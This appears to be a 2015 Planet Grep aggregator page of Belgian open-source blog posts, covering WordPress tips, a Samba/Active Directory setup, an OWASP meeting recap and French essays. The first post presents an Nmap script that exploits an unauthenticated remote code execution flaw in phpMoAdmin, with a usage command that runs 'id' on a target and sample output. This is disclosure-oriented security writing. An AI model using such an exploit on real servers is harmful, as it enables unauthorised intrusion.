Subscriptions

Planet Grep is open to all people who either have the Belgian nationality or live in Belgium, and who actively work with or contribute to Open Source/Free software.

About Planet Grep...

Other planets can be found at the Planet Index.

A complete feed is available in a number of syndication formats: RSS 1.0, RSS 2.0, FOAF, and OPML.

The layout of this site was done by Gregory

March 04, 2015

Xavier Mertens

phpMoAdmin 0-day Nmap Script

mongoDBAn 0-day vulnerability has been posted on Full-Disclosure this morning. It affects the MongoDB GUI phpMoAdmin. The GUI is similar to the well-known phpMyAdmin and allows the DB administrator to perform maintenance tasks on the MongoDB databases with the help of a nice web interface. The vulnerability is critical because it allows to perform remote code execution without being authenticated. All details are available in this Full-Disclosure post.

I wrote a quick and dirty Nmap script which tests the presence of a phpMoAdmin page and tries to exploit the vulnerability. The script can be used as following:

# nmap -sC --script=http-phpmoadmin \
     --script-args='http-phpmoadmin.uri=/moadmin.php \
                    http-phpmoadmin.cmd=id' \
     <target>

Example of output:

# nmap -sC --script=http-phpmoadmin --script-args='http-phpmoadmin.uri=/moadmin.php' \
-p 80 www.target.com

Starting Nmap 6.47SVN ( http://nmap.org ) at 2015-03-04 09:45 CET
Nmap scan report for www.target.com (192.168.2.1)
Host is up (0.027s latency).
rDNS record for 192.168.2.1: www.target.com
PORT STATE SERVICE
80/tcp open http
| http-phpmoadmin: 
|_Output for 'id':uid=33(www-data) gid=33(www-data) groups=33(www-data)

Nmap done: 1 IP address (1 host up) scanned in 0.52 seconds

The script is available here. Install it in your “$NMAP_HOME/share/nmap/scripts/” directory and enjoy!

by Xavier at March 04, 2015 09:10 AM

March 03, 2015

Lionel Dricot

Comment pourrait-il en être autrement ?

768478496_5775726141_z

Les méandres de la psychologie humaine font que, du cyclisme à la politique, on peut être un honnête tricheur, un menteur qui dit la vérité et un corrompu de bonne foi. Et si ce n’était pas les hommes qui corrompaient les institutions mais bien les institutions qui, par construction, ne laissaient aucun choix aux hommes ?

 

J’ai toujours imaginé qu’un jeune cycliste qui débutait devait être idéaliste. Il devait avoir entendu parler de dopage. Peut-être même l’avoir constaté. Mais lui s’en passerait. Quitte à ne pas toujours gagner. Son talent compenserait. Et puis gagner une seule étape était l’objectif de sa carrière, pas enfiler plusieurs grands tours.

Au fur et à mesure, il avait rencontré des difficultés. Des opportunités s’étaient présentées. Suite à des conseils et à un rhume, un médicament l’avait beaucoup aidé pour la course du lendemain.

Était-ce du dopage ? Certainement pas. Et puis, au fond, qu’est-ce que le dopage ? Une liste arbitraire de produits ? Sans le médicament, les performances s’écroulaient. Mais cette substance combinée à un traitement particulier du soigneur de l’équipe avaient un effet revigorant. Sans pour autant être du dopage. Pas du « vrai ».

Et puis il y a eu cette course. La veille, il se sentait un peu patraque. Mais il y avait un gros contrat de sponsoring à la clé s’il terminait dans les dix premiers. Il y avait une prime qui couvrirait amplement les travaux de la maison pour laquelle il s’était endetté. Ce n’était juste qu’une fois. Pas vraiment du dopage comme on en parle dans les journaux avec des grosses seringues. Non, juste une aide. Juste une fois.

Lorsque la nouvelle de sa disqualification est parue dans les journaux, le cycliste a fondu en larmes. Non, il ne s’était jamais dopé. Pas « vraiment ». Pas « dopé ». C’était injuste. Et puis il était un de ceux qui prenaient le moins de produits alors qu’il obtenait des résultats. Il était honnête. Il se croyait très sincèrement victime d’une injustice.

Non il ne mentait pas ! Il était profondément convaincu. Ce n’était pas vraiment du dopage. Au fond, qu’est-ce que le dopage ? Et puis, entre nous, avait-il seulement le choix ? Comment aurait-il pu faire autrement ?

 

*

Après des années de militantisme politique et suite à un concours de circonstances impliquant plusieurs démissions, vous voilà assis dans un bureau occupant vos premières fonctions d’élu. Vous ne pouvez vous empêchez d’être fier. Idéaliste, vous voyez là enfin un moyen d’agir, de rendre le monde qui vous entoure meilleur, plus humain, plus juste.

Votre travail, vous le réalisez très vite, consiste à dépenser l’argent public. Mais attention, vous allez faire ça correctement ! En bon gestionnaire ! Même si c’est la première fois de votre vie que vous avez le pouvoir de distribuer des millions, vous ne comptez pas vous laisser éblouir.

Sur votre bureau se trouve une demande pour subsidier l’organisation d’un festival de musique ésotérique.

Vous n’avez jamais entendu parler de musique ésotérique mais vous avez l’attention attirée : l’organisateur n’est autre qu’un ami d’enfance ! Le dossier est bien ficelé et ce festival a lieu chaque année. Ça a l’air très bien. La requête n’est que de 100.000€. Une paille dans votre budget ! Bref, vous ne voyez pas de raison de refuser cela à un ami d’enfance et vous accordez le budget.

Le lendemain, votre neveu vous annonce qu’il cherche un boulot comme graphiste. Au cours de la conversation, il vous apprend qu’il puise son inspiration dans la musique ésotérique. Cela vous donne une idée. Vous passez un rapide coup de fil à votre ami d’enfance pour lui annoncer que vous avez accordé le subside. Et vous demandez si le festival, fort de ce subside, n’aurait pas besoin des services d’un graphiste. Votre ami demande les coordonnées de votre neveux.

Vous êtes satisfait, vous avez rendu service à tout le monde. Vous vous sentez utile.

Quelques semaines plus tard, vous recevez une demande pour un festival similaire. En toute honnêteté, vous refusez. Un festival de musique ésotérique, c’est bien assez. Même si, cette fois, la demande émane d’une grande société spécialisée dans l’organisation de ce type d’événements.

Le lendemain, le directeur de la boîte de production vous appelle pour demander un rendez-vous. Une fois dans vos bureaux, il demande les raisons de votre refus. Vous les exposez. Le directeur vous annonce alors qu’il a découvert que le festival dont vous parlez est organisé par un de vos amis. Et que c’est dommage de favoriser ses amis.

Vous êtes estomaqués ! Vous ne favorisez pas vos amis. C’est juste que son festival a demandé les subsides avant, des subsides deux fois moins importants et qu’il a lieu chaque année. N’est-ce pas suffisant ?

Le directeur de la boîte de production propose alors de racheter la société organisant le festival actuel. Vous organisez donc une réunion avec votre ami et ce directeur.

Votre ami argue que la structure actuelle est une organisation sans but lucratif. Le directeur propose alors de racheter les droits à l’image et le nom pour 50.000€. Votre ami sera également engagé par la société comme organisateur et touchera un bon salaire. Vous placez alors le fait que votre neveu est également employé par l’association. Le directeur vous promet de l’engager.

L’affaire est conclue et vous participez à la mise en place de tout ce processus, en dehors de vos heures de travail. Le directeur vous demande alors d’envoyer vos factures pour vos heures prestées sur ce dossier. Le directeur lui-même veut bien payer « jusqu’à 200h de travail ». Vous créez en catastrophe une société avec votre époux afin d’établir cette facture au tarif de 100€ de l’heure.

L’année d’après, vous découvrez que le subside demandé est passé à 200.000€. Mais le festival a grandi, c’est normal, vous l’accordez.

Comme vous avez gagné 20.000€ avec le festival précédent, vous prenez conscience que vous êtes doué. Le tarif n’est-il pas proportionnel à la compétence ? Dire qu’il vous fallait un an pour gagner une telle somme auparavant ! Enfin, vous avez trouvé votre voie, votre talent ! Vous proposez alors à votre ami d’organiser le lancement d’un autre type de festival afin d’également revendre le concept. Cette fois-ci, vous créez une société directement avec votre ami. Mais votre ami crée une ASBL qui sous-traitera l’organisation à la société en question. Parce qu’on ne peut pas donner de subsides à une société. Votre société s’appelle donc désormais « Festival Consult ».

Votre ami démissionne officiellement pour continuer à occuper les mêmes fonctions qu’avant mais cette fois en faisant facturer ses heures via Festival Consult. Une excellente idée. De plus, cela lui permet de payer moins d’impôts. La grande société vous demande également des conseils dans l’organisation de plusieurs autres festivals et vous pouvez facturer votre expertise.

Une feuille de chou à sensation s’empare soudain de l’affaire et vous découvrez que vous êtes accusé de corruption. Corruption ! 
Vous ? Jamais ! Quel scandale ! Vous n’avez fait que mettre vos compétences dans vos heures de loisir au service de l’organisation de festivals musicaux.

Vous ne comprenez même pas ce que qu’on vous reproche. Vous ne pouvez qu’être innocent. D’ailleurs, qu’est-ce que la corruption ? Si c’était à refaire, vous ne voyez même pas ce que vous pourriez changer ! En toute honnêteté, comment auriez-vous pu agir autrement ?

 

Photo par Coolmonfrere.

Merci d'avoir pris le temps de lire ce billet librement payant. Prenez la liberté de me soutenir avec quelques milliBitcoins, une poignée d'euros, en me suivant sur Tipeee, Twitter, Google+ et Facebook !

Ce texte est publié par Lionel Dricot sous la licence CC-By BE.

flattr this!

by Lionel Dricot at March 03, 2015 09:45 PM

Frank Goossens

Quick tip; disabling WordPress author pages

I helped build a WordPress-site for a not-for-profit and they asked me to disable the author pages. Although I’m sure there are multiple plugin-based solutions, I ended up simply adding an author.php to my (child) theme with this in it;

<?php
header("HTTP/1.1 301 Moved Permanently");
header("Location: /");
?>

As author.php is used for all author pages (if available, else archive.php is used), every attempt to reach an author page will result in a permanent redirect being sent, effectively disabling the author archive. Keeping it simple stupid!

by frank at March 03, 2015 07:19 PM

March 02, 2015

Wouter Verhelst

NBD 3.9

I just released NBD 3.9

When generating the changelog, I noticed that 3.8 happened two weeks shy of a year ago, which is far too long. As a result, the new release has many new features:

Get it at the usual place.

March 02, 2015 07:39 PM

Dries Buytaert

How much money to raise for your startup? [Flowchart]

From time to time, people ask me how much money to raise for their startup. I've heard other people answer that question from "never raise money" to "as little as you need" to "as much as you can".

The reason the answers vary so much is because what is best for the entrepreneur is seemingly at odds with what is best for the business. For the entrepreneur, the answer can be as little as necessary to avoid dilution or giving up control. For the business, more money can increase its chances of success. I feel the right answer is somewhere in the middle -- focus on raising enough money, so the company can succeed, but make sure you still feel good about how much control or ownership you have.

But even "somewhere in the middle" is a big spectrum. What makes this so difficult is that it is all relative to your personal risk profile, the quality of the investors you're attracting, the market conditions, the size of the opportunity, and more. There are a lot of parameters to balance.

I created the flowchart below (full-size image) to help you answer the question. This flowchart is only a framework -- it can't take into account all decision-making parameters. The larger the opportunity and the better the investors, they more I'd be willing to give up. It's better to have a small part of something big, than to have a big part of something small.

How much money to raise for your startup

Some extra details about the flowchart:

  • In general, it is good to have 18 months of runway. It gives you enough time to figure out how to get your company to the next level, but still keeps the pressure on.
  • Add 6 months of buffer to handle unexpected bumps or budgeting oversights.
  • If more money is available, I'd take it as long you don't give away too much of your company. As a starting point for how much control to give up, I use the following formula: 30% - (5% x number of the round). So if you are raising your series A (round 1), don't give away more than 25% (30 - (5 x 1)). If you are raising your series B (round 2), don't give away more than 20% (30 - (5 x 2)). If you start with 50% of the shares, using this formula, you'll still have roughly 20% of the company after 5 rounds (depending on other dilutive events such as option pool increases).

My view is that of an entrepreneur having raised over $120 million for one startup. If you're interested in an investor's view that has funded many startups, check out Michael Skok's post. Michael Skok is Acquia's lead investor and one of Acquia's Board of Directors. We both tried to answer the question from our own unique viewpoint.

by Dries at March 02, 2015 01:52 PM

February 28, 2015

Lionel Dricot

La fin de la publicité chez Apple ?

7178643521_c0b1e40ec2_z

À moins de vivre sur une autre planète, vous ne pouvez avoir manqué l’annonce faite par Tim Cook lors de la dernière keynote d’Apple. Le moins que l’on puisse dire c’est qu’Apple s’y entend pour créer le buzz. Et que vous soyez un Apple fanboy ou, au contraire, profondément indigné par cette annonce, force est de constater que nul ne peut rester indifférent.

Car, malgré un chiffre d’affaire record, l’année 2016 était placée par de nombreux analystes comme l’année de tous les dangers pour la firme de Cupertino.

Après le rachat définitif de Cyanogenmod par Microsoft et le mode compatibilité annoncé dans Windows 11, Android s’est installé définitivement comme la plateforme mobile de référence, depuis les montres aux télévisions géantes en passant par les liseuses et les ordinateurs. Après les Chromebooks de Google, les Kindle Amazon et les télévisions Samsung, c’est au tour de Microsoft de se rendre 100% compatible avec les applications Android.

Une aubaine pour les développeurs qui ne doivent plus développer que pour une seule plateforme ? Non car une plateforme résiste encore et toujours à l’envahisseur : Apple, jadis la préférée des développeurs, elle est aujourd’hui subtilement délaissée. Il n’est plus rare de trouver des applications tournant sur Android mais sans équivalent sur Iphone, chose impensable il y a seulement deux ans.

Apple en difficulté et en perte de vitesse ? Même si la faiblesse est toute relative, Google ne pouvait laisser passer l’occasion de porter un coup fatal à son adversaire. Rompant la trêve tacite de non-aggression, les avocats du géant de Mountain View ont donc décidé de porter plainte contre Apple pour utilisation illégale de plusieurs brevets. Brevets majoritairement dédiés à l’affichage de publicités dans les applications mobiles et les app stores. L’idée est très simple : priver Apple d’une partie substantielle de ses revenus tout en forçant le paiement d’une amende salée.

Mais la réponse de Tim Cook avant-hier a laissé Internet sans voix.

Désormais, les publicités ne seront tout simplement plus acceptées dans les applications sur l’App Store. Safari intégrera par défaut un bloqueur de publicités. Un ouragan dans le monde du mobile. Une véritable révolution pour toute l’industrie du logiciel.

« Apple a pour mission d’offrir la meilleure expérience à ses utilisateurs. Une expérience de confort, de luxe et de productivité, a déclaré Tim Cook, évitant toute référence directe au litige en cours. La publicité ne répond pas à ces critères. Pire, la plupart des applications embarquant de la publicité le font dans le but de dégrader l’expérience afin de convaincre l’utilisateur de passer à la version payante. »

Mais la firme ne compte pas s’arrêter là.

« Nous allons progressivement mettre en place un abonnement qui donnera accès gratuitement à toutes les applications de l’app store, sans aucune restriction. Les auteurs des applications toucheront un pourcentage de cet abonnement en fonction du nombre d’utilisateurs et de l’usage de ces applications. Nous espérons de cette manière mettre en place un système plus égalitaire et plus intéressant pour les petits développeurs mais également plus simple et plus efficace pour les utilisateurs, qui peuvent installer et désinstaller en fonction de leur besoin. Nous poursuivons donc la logique Pay Once and Play mise en place en 2015. »

Pour la plupart des éditeurs de contenus vivant de la publicité, la nouvelle est une catastrophe. Certains organismes de presse envisage même d’attaquer Apple en justice. Mais comme l’a expliqué Tim Cook, les alternatives existent.

« Depuis des années, les produits Apple bloquent automatiquement les tentatives d’intrusions et d’installations de logiciels malveillants. Techniquement, la publicité peut être perçue comme l’installation d’un logiciel malveillant dans le cerveau de l’utilisateur. D’un point de vue éthique, une société qui a la vocation de servir ses utilisateurs ne peut pas ne pas les bloquer. »

« Quand aux sites webs qui vivent de la publicité, nous les encourageons à developper une application dédiée. Cela leur permettra de toucher un pourcentage sur les abonnements à l’App Store souscrit par leurs utilisateurs. Ils pourront donc se concentrer à satisfaire leurs utilisateurs et non plus les intermédiaires du monde de la publicité. »

Sur Twitter, les messages se déchainent et les plus cyniques ont bien entendu relevé l’hypocrisie du fait qu’Apple est une entreprise au marketing particulièrement rodé dont les publicités sont dans toutes les grandes villes. Le compte Twitter officiel d’Apple y a d’ailleurs répondu :

There’s a thin line between informations and advertising.

(La frontière est floue entre l’information et la publicité)

Our goal is to ensure that our communication is like our product : efficient, elegant, useful and never intrusive.

(Notre objectif est que notre communication soit comme nos produits : efficace, élégant, utile mais jamais intrusif)

Quoiqu’il en soit, voici une nouvelle qui va certainement faire bouger les choses et qui, à termes, pourrait s’avérer bénéfiques pour les utilisateurs.

 

Photo par Mike Deerkoski.

Merci d'avoir pris le temps de lire ce billet librement payant. Prenez la liberté de me soutenir avec quelques milliBitcoins, une poignée d'euros, en me suivant sur Tipeee, Twitter, Google+ et Facebook !

Ce texte est publié par Lionel Dricot sous la licence CC-By BE.

flattr this!

by Lionel Dricot at February 28, 2015 05:20 PM

Frank Goossens

More goodness in wordpress.org plugin repo updates

Seems like the wordpress.org plugin pages, after recent improvements to the ratings-logic, now got an even more important update. They now use “active installations” as most important metric (as has been done on drupal.org module pages for years), with total number of downloads having been relegated to the stats page.

That stats page got a face-lift as well, featuring a graph of the active versions:

autoptimize wp.org plugin page

In case you’re wondering what the source of that “active installations” data is, I was too and reached out to plugin-master Otto (Samuel Wood, who replied;

[The source data comes from] plugin update checks. Every WP install asks for update checks every 12 hours or so. We store a count of that info.

by frank at February 28, 2015 08:51 AM

February 26, 2015

Xavier Mertens

The Evil CVE: CVE-666-666 – “Report Not Read”

That Escalated QuicklyI had an interesting discussion with a friend this morning. He explained that, when he is conducting a pentest, he does not hesitate to add sometimes in his report a specific finding regarding the lack of attention given to the previous reports. If some companies are motivated by good intentions and ask for regular pentests against their infrastructure or a specific application, what if they even don’t seem to read the report and take it into account to improve their security level? What if the same security issues are discovered during the next tests? This does not motivate the pentester and costs a lot of money for nothing.

The idea of the “evil” CVE popped up in our mind during our chat. What about a specific CVE number to report the issue of non-reading previous reports? As defined by Wikipedia, the “Common Vulnerabilities and Exposures” (CVE) system provides a reference-method for publicly known information-security vulnerabilities and exposures. And a vulnerability can be defined as a weakness in a product or infrastructure that could allow an attacker to compromise the integrity, availability of confidentiality of that product or infrastructure.

Based on this definition, the fact to not read and take appropriate the corrective actions listed in the previous pentest report is a new vulnerability! A good pentest report should contain vulnerabilities and mitigations to remove (or reduce) the associated risks. It is stupid to not read the report and apply the mitigations. Even more if some of them are quickly (and sometimes cheaply) implemented. Think about the evil CVE-666-666 while writing your future reports! Note that the goal is not to blame the customer (who also pays you!) but to educate him.

 

by Xavier at February 26, 2015 08:41 PM

Wouter Verhelst

Dear non-Belgian web developer,

Localization in the web context is hard, I know. To make things easier, it may seem like a good idea to use GeoIP to detect what country an IP is coming from and default your localization based on that. While I disagree with that premise, this blog post isn't about that.

Instead, it's about the fact that most of you get something wrong about this little country. I know, I know. If you're not from here, it's difficult to understand. But please get this through your head: Belgium is not a French-speaking country.

That is, not entirely. Yes, there is a large group of French-speaking people who live here. Mostly in the south. But if you check the numbers, you'll find that there are, in fact, more people in Belgium who speak Dutch rather than French. Not by a very wide margin, mind you, but still by a wide enough margin to be significant. Wikipedia claims the split is 59%/41% Dutch/French; I don't know how accurate those numbers are, but they don't seem too wrong.

So please, pretty please, with sugar on top: next time you're going to do a localized website, don't assume my French is better than my English. And if you (incorrectly) do, then at the very least make it painfully obvious to me where the "switch the interface to a different language" option in your website is. Because while it's annoying to be greeted in a language that I'm not very good at, it's even more annoying to not be able to find out how to get the correctly-localized version.

Thanks.

February 26, 2015 09:22 AM

Frank Goossens

wordpress.org plugin repo: ratings changed

autoptimize ratings on feb 26th 2015Yesterday the average rating of all plugins on the wordpress.org repository changed; ratings that were not linked to a review, were removed. That means that ratings dating from before approximately November 2012, when reviews were introduced, are not being taken into account any more.

This had a positive impact on the average rating of my own plugins, but especially so for Autoptimize. That plugin was largely unsupported before I took over in January 2013 and got some low ratings as a consequence (the average was 4.2 at the time, if I’m not mistaking). With those old numbers now out of the way, the average went from 4.6 to 4.8 overnight. Yay!

by frank at February 26, 2015 06:36 AM

February 25, 2015

Mattias Geniar

Up And Close With PHP 7’s New RFCs

The post Up And Close With PHP 7’s New RFCs appeared first on ma.ttias.be.

If you're following the development of PHP 7, you'll notice a lot of new RFCs (and some old ones that have been revived) are popping up again. How do you keep track of them and test their functionality?

The answer always used to be: compile PHP from the latest sources and test it yourself. But that's not very handy, is it?

RFC Watch

Enter the PHP RFC Watch, a very cool side-project of Benjamin Eberlei.

php_rfc_watch

It keeps tracks of the difference PHP RFCs, who voted and what they actually voted. You can filter on the open RFCs at the right-hand side.

Testing new RFC functionality

The PHP community has been really fortunate to have a tool like 3v4l.org, that allows you to spin up a PHP/HHVM shell to test some PHP code -- free of charge!.

And as of a few days, there is also support for RFC branches of PHP that you can test!

For instance, want to try out the new Scalar Type hints in PHP7? It includes the strict_mode option and you can test it out in an online shell!

<?php
declare(strict_types=1);
 
foo(); // strictly type-checked function call
 
function foobar() {
    foo(); // strictly type-checked function call
}
 
class baz {
    function foobar() {
        foo(); // strictly type-checked function call
    }
}

This is a really cool resource, I hope more RFC branches make their way to it.

Props to @3v4l_org!

The post Up And Close With PHP 7’s New RFCs appeared first on ma.ttias.be.

by Mattias Geniar at February 25, 2015 09:27 PM

Frank Goossens

Dat de staat innovatie in de weg staat?

In de hippe wereld van startups en zelfverklaarde innovatoren wordt de staat nogal makkelijk weggezet als dé grote hinderpaal voor échte innovatie. En dan lees je dit;

Wezenlijke innovatie kost minstens tien tot vijftien jaar, schrijft Mazzucato, maar de spanningsboog van private durfkapitalisten is hoogstens een jaar of vijf. Zij gaan pas een rol spelen als de grootste risico’s al zijn genomen door de staat. […] Maar als je de staat voortdurend wegzet als logge sukkel, dan kom je nooit ergens. Aanvankelijk is het niet de onzichtbare hand van de markt, maar de zichtbare hand van de staat die de weg wijst. De overheid is er niet alleen om het falen van de markt te voorkomen. Zonder de staat zou er in veel gevallen niet eens een markt zijn.

Het volledige artikel (opgebouwd rond onderzoek van de Italiaanse econome Mariana Mazzucato en toegepast op Silicon Valley maar ook dichter bij huis ASML) kun je lezen op De Correspondent.

by frank at February 25, 2015 12:00 PM

Sébastien Wains

Samba integrated to Active Directory on RHEL7

Tested with Active Directory 2003 and RHEL 7.0

For RHEL 6.0 see here

I consider that the server is correctly set up, its hostname should be set accordingly to the Active Directory domain. It should also be synchronised with NTP. A clock drift could cause issues because of Kerberos.

I assume an AD domain "EXAMPLE" (long name: intranet.example.org)

# host -t srv _kerberos._tcp.intranet.example.org
_kerberos._tcp.intranet.example.org has SRV record 0 100 88 srv00a.intranet.example.org.
_kerberos._tcp.intranet.example.org has SRV record 0 100 88 srv00c.intranet.example.org.
_kerberos._tcp.intranet.example.org has SRV record 0 100 88 srv00b.intranet.example.org.

Install the packages:

# yum -y install authconfig samba samba-winbind samba-winbind-clients pam_krb5 krb5-workstation oddjob-mkhomedir nscd adcli ntp

Enable the services at boot:

# systemctl start smb
# systemctl enable smb
# systemctl start winbind
# systemctl enable winbind
# systemctl start oddjobd 
# systemctl enable oddjobd
# systemctl start dbus

Edit /etc/krb5.conf:

[logging]
 default = FILE:/var/log/krb5libs.log
 kdc = FILE:/var/log/krb5kdc.log
 admin_server = FILE:/var/log/kadmind.log

[libdefaults]
 default_realm = INTRANET.EXAMPLE.ORG
 dns_lookup_realm = true
 dns_lookup_kdc = true
 ticket_lifetime = 24h
 renew_lifetime = 7d
 forwardable = true

[realms]
 EXAMPLE.COM = {
  kdc = kerberos.example.com
  admin_server = kerberos.example.com
 }

 INTRANET.EXAMPLE.ORG = {
 }

[domain_realm]
 .example.com = EXAMPLE.COM
 example.com = EXAMPLE.COM
 intranet.example.org = INTRANET.EXAMPLE.ORG
 .intranet.example.org = INTRANET.EXAMPLE.ORG

Test Kerberos:

# kinit username@INTRANET.EXAMPLE.ORG
# klist

username should be domain admin in the Active Directory.

klist should gives this kind of output:

Ticket cache: FILE:/tmp/krb5cc_0
Default principal: username@INTRANET.EXAMPLE.ORG

Valid starting       Expires              Service principal
02/25/2015 15:23:30  02/26/2015 01:23:30  krbtgt/INTRANET.EXAMPLE.ORG@INTRANET.EXAMPLE.ORG
    renew until 03/04/2015 15:23:28

Delete the Kerberos ticket you just initialized:

# kdestroy

Edit /etc/samba/smb.conf:

[global]
workgroup = EXAMPLE
realm = INTRANET.EXAMPLE.ORG
security = ads
idmap uid = 10000-19999
idmap gid = 10000-19999
idmap config EXAMPLE:backend = rid
idmap config EXAMPLE:range = 10000000-19999999
;winbind enum users = no
;winbind enum groups = no
;winbind separator = +
winbind use default domain = yes
winbind offline logon = false
template homedir = /home/EXAMPLE/%U
template shell = /bin/bash

    server string = Samba Server Version %v

    log file = /var/log/samba/log.%m
    log level = 10
    max log size = 50
    passdb backend = tdbsam

[share]
    path = /home/share
    comment = Some cool directory
    writable = yes
    browseable = yes
    # there's a trust between EXAMPLE and EXAMPLE2
    valid users = username EXAMPLE2\username
    directory mask = 0777
    create mask = 0777

Restart Samba:

# systemctl restart smb

Join the domain:

# net join -S EXAMPLE -U username

It should work and you can then get information regarding the join:

# net ads info
LDAP server: 192.168.0.1
LDAP server name: SRV00C.intranet.example.org
Realm: INTRANET.EXAMPLE.ORG
Bind Path: dc=INTRANET,dc=EXAMPLE,dc=ORG
LDAP port: 389
Server time: Wed, 25 Feb 2015 15:27:05 CET
KDC server: 192.168.0.1
Server time offset: 0

Create the directory for AD users:

# mkdir /home/EXAMPLE/
# chmod 0777 /home/EXAMPLE/

Restart Winbind:

# systemctl restart winbind

Sources:

redhat.com

February 25, 2015 05:00 AM

February 24, 2015

Xavier Mertens

OWASP Belgium Chapter Meeting February 2015 Wrap-Up

Jim on stageTonight the first Belgium OWASP chapter meeting of the year 2015 was organized in Leuven. Next to the SecAppDev event also organised in Belgium last week, many nice speakers were present in Belgium. It was a good opportunity to ask them to present a talk at a chapter meeting. As usual, Seba opened the event and reviewed the latest OWASP Belgium news before giving the word to the speakers.

The first speaker was Jim DelGrosso from Cigital. Jim talked about “Why code review and pentests are not enough?”. His key message was the following: penetration tests are useful but they can’t find all types of vulnerabilities. That’s why other checks are required. So how to improve our security tests? Before conducting a penetration test, a good idea is just to check the design of the target application and some flaws can already be found! At this point, it is very important to make a difference between a “bug” and a “flaw”. Bugs are related to implementation and flaws are “by design”. The ratio between bugs and flaws is almost 50/50. Jim reviewed some examples of bugs: XSS or buffer overflows are nice ones. To resume, a bug is related to “coding problems”. And the flaws? Examples are weak, missing or wrong security controls (ex: if a security feature can be bypassed by the user). But practically, how to find them? Are they tools available? To find bugs, the classic code review process is used (we look at patterns). Pentests can also find bugs but overlaps with findings flaws. Finally, a good analysis of the architecture will focus on flows. Jim reviewed more examples just to be sure that the audience made the difference between the two problems:

Then Jim asked the question: “How are we doing?” regarding software security. The OWASP Top-10 is a good reference for almost ten years now for most of us. Jim compared the different versions across years and demonstrated that the same attacks remain but their severity level change regularly. Also, seven out of them have been the same for ten years! Does it mean that they are very hard to solve? Do we need new tools? Some vulnerabilities dropped or disappeared because developers use today’s frameworks which are more protected. Others are properly detected and blocked. A good example are XSS attacks blocked by modern browsers. Something new raised in 2013: The usage of components with known vulnerabilities (dependencies in apps).

So practically, how to find flaws? Jim recommends to perform code review. Penetration tests will find less flaws and will require more time. But we need something else: A new type of analysis focusing on how we design a system and a different set of checklists. That’s why the IEEE Computer Society started a project to expand their presence in security. They started with an initial group of contributors and built a list of points to avoid the classic top-10 security flaws:

Heartbleed is a nice example to demonstrate how integrating external components may increase your surface attack. In this case, the openssl library is used to implement new features (cryptography) but also introduced a bug. To conclude his presentation, Jim explained three ways to find flaws:

A very interesting approach to a new way to test your applications! After a short break, the second speaker, Aurélien Francillon from EURECOM, presented “An analysis of exploitation behaviours on the web and the role of web hosting providers in detecting them”. To be more precise, the talk was about “web honeypots”. Today, most companies have a coporate website or web applications. Often they are hosted on a shared platform maintained by a hosting provider. How do they handle the huge amount of malicious traffic sent and received by their servers? The first part was dedicated to the description of the web honeypot built by EURECOM. The goal was to understand what were the motivations of web attackers,  what they do while and after they exploited a vulnerability on a website and to understand why attacks are carried out (for fun, profit, damage, etc). There was previous studies but they lack of such details.
Aurélien on stage

How to deploy the honeypot? Aurélien explained that 500 vulnerable websites were deployed on the Internet using 100 domains registered with five subdomains each. They were hosted on nice of the biggest hosting providers. Each websites had five common CMS with classic vulnerabilities. Once deployed, the data collection occurred for 100 days. Each website acted as a proxy and its traffic was redirected to the real web apps running on virtual machines. Why? It’s easy to reinstall, they allow full logging and it’s easy to tailor and limit the attackers privileges. About the collection data, it was impressive:

Aurélien gave some facts about the different phases of an attack:

Based on the statistics, some trends were confirmed:

The second part of the presentation focused on hosting providers. Do they complain? How do they detect malicious activity (if they detect it)? Do they care about security? Today hosting solutions are cheap, there are millions of websites maintained by inexperienced owners. This make the attack surface very large. Hosting providers should play a key role in help users. Is it the case? Hélas, according to Aurélien, no! To perform the tests, EURECOM registered multiple shared hosting accounts at multiple providers, they deployed web apps and simulated attacks:

In a first phase 1, they just observed the provider’s reaction. The second one was to take contact with it to report an abuse (one real and one illegitimate). Twelve providers were tested from the top US-based and ten from other regions (Europe, Asia, …). What were the results?
  • At registration time, some did some screening (like phone calls), some verified the provided data and only three performed a 1-click registration (no check at all).
  • Some have URL blacklisting in place.
  • Filtering occurs at OS level (ex: to prevent callbacks on suspicious ports) but the detection rate is low in general.
  • About the abuse reports: 50% never replied, amongst the others, 64% replied in one day. Wide variety of reactions
  • Some providers offers (read: sell) security add-ons. Five out of six did not detect anything. One detected but never notified the customer.
To conclude the research: most providers fail to provide correct security services, services are cheap so do not expect good services. Note that the providers names were not disclosed by Aurélien!
It was a very nice event to start the year 2015! Good topics and good speakers!

by Xavier at February 24, 2015 10:28 PM

Mattias Geniar

Firefox 36 Fully Supports HTTP/2 Standard

The post Firefox 36 Fully Supports HTTP/2 Standard appeared first on ma.ttias.be.

Now that's fast.

Support for the full HTTP/2 protocol. HTTP/2 enables a faster, more scalable, and more responsive web.

Just 2 weeks after the HTTP/2 spec was declared final, Firefox 36 ships with the updated HTTP/2 protocol. Well played, Mozilla.

The post Firefox 36 Fully Supports HTTP/2 Standard appeared first on ma.ttias.be.

by Mattias Geniar at February 24, 2015 09:28 PM

Wim Coekaerts

Oracle Linux and Database Smart Flash Cache

One, sometimes overlooked, cool feature of the Oracle Database running on Oracle Linux is called Database Smart Flash Cache.

You can find an overview of the feature in the Oracle Database Administrator's Guide. Basically, if you have flash devices attached to your server, you can use this flash memory to increase the size of the buffer cache. So instead of aging blocks out of the buffer cache and having to go back to reading them from disk, they move to the much, much faster flash storage as a secondary fast buffer cache (for reads, not writes).

Some scenarios where this is very useful : you have huge tables and huge amounts of data, a very, very large database with tons of query activity (let's say many TB) and your server is limited to a relatively small amount of main RAM - (let's say 128 or 256G). In this case, if you were to purchase and add a flash storage device of 256G or 512G (example), you can attach this device to the database with the Database Smart Flash Cache feature and increase the buffercache of your database from like 100G or 200G to 300-700G on that same server. In a good number of cases this will give you a significant performance improvement without having to purchase a new server that handles more memory or purchase flash storage that can handle your many TB of storage to live in flash instead of rotational storage.

It is also incredibly easy to configure.

-1 install Oracle Linux (I installed Oracle Linux 6 with UEK3)
-2 install Oracle Database 12c (this would also work with 11g - I installed 12.1.0.2.0 EE)
-3 add a flash device to your system (for the example I just added a 1GB device showing up as /dev/sdb)
-4 attach the storage to the database in sqlplus
Done.

$ ls /dev/sdb
/dev/sdb

$ sqlplus '/ as sysdba'

SQL*Plus: Release 12.1.0.2.0 Production on Tue Feb 24 05:46:08 2015

Copyright (c) 1982, 2014, Oracle.  All rights reserved.


Connected to:
Oracle Database 12c Enterprise Edition Release 12.1.0.2.0 - 64bit Production
With the Partitioning, OLAP, Advanced Analytics and Real Application Testing options

SQL>  alter system set db_flash_cache_file='/dev/sdb' scope=spfile;

System altered.

SQL> alter system set db_flash_cache_size=1G scope=spfile;

System altered.

SQL> shutdown immediate;
Database closed.
Database dismounted.
ORACLE instance shut down.

